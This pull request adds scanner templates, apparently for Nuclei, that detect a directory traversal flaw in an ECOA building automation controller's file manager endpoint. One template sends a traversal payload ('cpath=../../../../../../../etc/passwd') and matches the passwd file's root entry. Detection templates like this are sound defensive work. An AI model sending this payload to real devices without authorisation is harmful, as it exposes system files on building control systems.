### PR TITLE
Create ecoa-building-directory-traversal.yaml

### DIFF
--- a/vulnerabilities/other/ecoa-building-directory-traversal.yaml
+++ b/vulnerabilities/other/ecoa-building-directory-traversal.yaml
@@ -1,0 +1,23 @@
+id: ecoa-building-directory-traversal
+
+info:
+  name: ECOA Building Automation System - Directory Traversal Content Disclosure
+  author: gy741
+  severity: high
+  description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
+  tags: ecoa,traversal
+
+requests:
+  - raw:
+      - |
+        GET /fmangersub?cpath=/ HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        words:
+          - "bacevent.elf"
+          - "redown.elf"
+          - "system.bin"
+        condition: and

--- a/vulnerabilities/other/ecoa-building-lfi.yaml
+++ b/vulnerabilities/other/ecoa-building-lfi.yaml
@@ -1,4 +1,4 @@
-id: ecoa-building-directory-traversal
+id: ecoa-building-lfi
 
 info:
   name: ECOA Building Automation System - Directory Traversal Content Disclosure
@@ -6,18 +6,16 @@ info:
   severity: high
   description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
   reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
-  tags: ecoa,traversal
+  tags: ecoa,lfi
 
 requests:
   - raw:
       - |
-        GET /fmangersub?cpath=/ HTTP/1.1
+        GET /fmangersub?cpath=../../../../../../../etc/passwd HTTP/1.1
         Host: {{Hostname}}
 
     matchers:
-      - type: word
-        words:
-          - "bacevent.elf"
-          - "redown.elf"
-          - "system.bin"
-        condition: and
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body


### PR DESCRIPTION
### Template / PR Information

Hello,

Added Create ecoa-building-directory-traversal.yaml

```
The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
```

- References: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php

### Template Validation

I've validated this template locally?
- [ ] YES
- [x] NO
